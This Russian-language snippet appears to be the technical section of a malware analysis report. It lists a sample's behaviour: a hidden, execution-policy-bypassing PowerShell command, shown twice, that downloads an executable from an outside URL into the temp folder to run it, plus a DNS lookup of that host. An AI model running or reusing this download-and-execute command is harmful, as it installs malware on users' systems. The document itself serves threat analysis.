Техническая информация
- http://www.raquelperezcoach.com/kelechi.exe как %temp%\\cpudll.exe
- '<SYSTEM32>\cmd.exe' /c PoWErShelL.eXe -wInDoWstyle HIDDeN -nOPRoFilE -eXEcutIoNPoLICy bYpasS (NEw-OBjEcT SyStem.NEt.WeBCLieNt).DowNLOADFiLe('http://www.raquelperezcoach.com/kelechi.exe','%TEMP%\\CPUdll.exe') & %TE...
- DNS ASK ra#####erezcoach.com
- '<SYSTEM32>\cmd.exe' /c PoWErShelL.eXe -wInDoWstyle HIDDeN -nOPRoFilE -eXEcutIoNPoLICy bYpasS (NEw-OBjEcT SyStem.NEt.WeBCLieNt).DowNLOADFiLe('http://www.raquelperezcoach.com/kelechi.exe','%TEMP%\\CPUdll.exe') & %TE...' (со скрытым окном)